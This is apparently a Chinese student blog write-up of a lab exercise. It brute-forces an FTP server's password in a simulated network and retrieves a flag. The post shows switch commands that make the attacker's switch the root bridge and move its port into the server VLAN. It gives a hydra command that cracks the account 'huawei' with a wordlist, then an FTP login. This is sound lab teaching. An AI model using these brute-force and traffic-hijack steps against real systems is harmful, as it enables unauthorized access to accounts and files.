FTP爆破密码登陆获取flag
实验要求成功爆破服务端密码并提交服务端flag.txt中的flag
1、拓补图
2、基础配置
-
关闭防火墙
-
查看服务端IP
interface GigabitEthernet0/0/0 ip address 192.168.66.22 255.255.255.0
-
给AR1配置IP,并且尝试ping服务端,能通
interface GigabitEthernet0/0/0 ip address 192.168.66.11 255.255.255.0
-
我们从LSW1这个地方注入攻击,所以要先将流量更改到LSW1,将LSW1改为根桥(补充:如果更改了根桥后AR1不能ping通服务端的话,将LSW4的所有端口配置为access口,并加入vlan10即可)
stp root primary
-
攻击机ping服务端,发现没有成功,查看LSW1上的配置(vlan),接口属于vlan10,所以攻击者流量进来的接口也要划分到与通往服务端接口的vlan(vlan10)
vlan 10 int g0/0/24 port link-type access port default vlan 10
-
至此,攻击者就能ping通服务端
└─$ ping 192.168.66.22 PING 192.168.66.22 (192.168.66.22) 56(84) bytes of data. 64 bytes from 192.168.66.22: icmp_seq=1 ttl=255 time=49.7 ms 64 bytes from 192.168.66.22: icmp_seq=2 ttl=255 time=43.8 ms 64 bytes from 192.168.66.22: icmp_seq=3 ttl=255 time=52.0 ms 64 bytes from 192.168.66.22: icmp_seq=4 ttl=255 time=44.6 ms ^X@sS64 bytes from 192.168.66.22: icmp_seq=5 ttl=255 time=53.0 ms 64 bytes from 192.168.66.22: icmp_seq=6 ttl=255 time=47.4 ms 64 bytes from 192.168.66.22: icmp_seq=7 ttl=255 time=60.3 ms 64 bytes from 192.168.66.22: icmp_seq=8 ttl=255 time=51.9 ms ^X@sS64 bytes from 192.168.66.22: icmp_seq=9 ttl=255 time=45.2 ms 64 bytes from 192.168.66.22: icmp_seq=10 ttl=255 time=63.0 ms
3、hydra爆破密码
-
打开kali,进入root权限,输入
hydra -l huawei -P /home/kali/Desktop/psword.txt -t 16 -vV 192.168.66.22 ftp
参数 意义 -l 指定账户 -P 指定密码本路径 -t 开启多线程 -vV 显示详细信息
成功爆破密码(绿色显示),密码为admin123
4、登陆FTP服务
4.1 Linux登陆 FTP 服务端
-
登陆FTP,输入dir查看当前路径下文件,看见我们需要的flag.txt
-
将文件保存到桌面(没成功)
get flag.txt /home/kali/Desktop/
-
换个方式,找个文件夹,在上方的文件夹路径登陆FTP
ftp://192.168.66.22
-
登陆成功,看到了flag.txt
-
双击打开
查看到flag为
U2FsdGVkX18jg+wKJhvCZYU0DQPKSSH8
4.2 Windows登陆 FTP 服务端
-
也是直接找个文件夹登陆FTP
-
先将文件拖到桌面保存再打开即可
标签:FTP,爆破,seq,期中考试,bytes,192.168,ttl,66.22,服务端 From: https://blog.csdn.net/2302_77669548/article/details/143653399